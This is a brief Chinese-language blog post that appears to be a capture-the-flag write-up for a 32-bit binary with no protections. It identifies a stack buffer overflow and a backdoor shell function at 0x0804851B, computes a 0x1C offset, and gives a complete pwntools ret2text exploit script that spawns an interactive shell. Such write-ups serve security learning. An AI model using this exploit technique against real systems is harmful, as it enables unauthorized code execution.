先分析一下,32位程序,无保护,可执行

用IDA分析,发现buf存在泄露点

shell函数存在后门,在0x0804851B

计算一下长度,0x18+0x4=0x1C

构造exp如下

from pwn import *

filename = "./pwn"
p = remote("", )
shell = 0x0804851B
payload = b'a'*0x1C + p32(shell)
p.sendline(payload)
p.interactive()

 

posted on 2022-11-16 15:18  ZackMount  阅读(162)  评论(0编辑  收藏  举报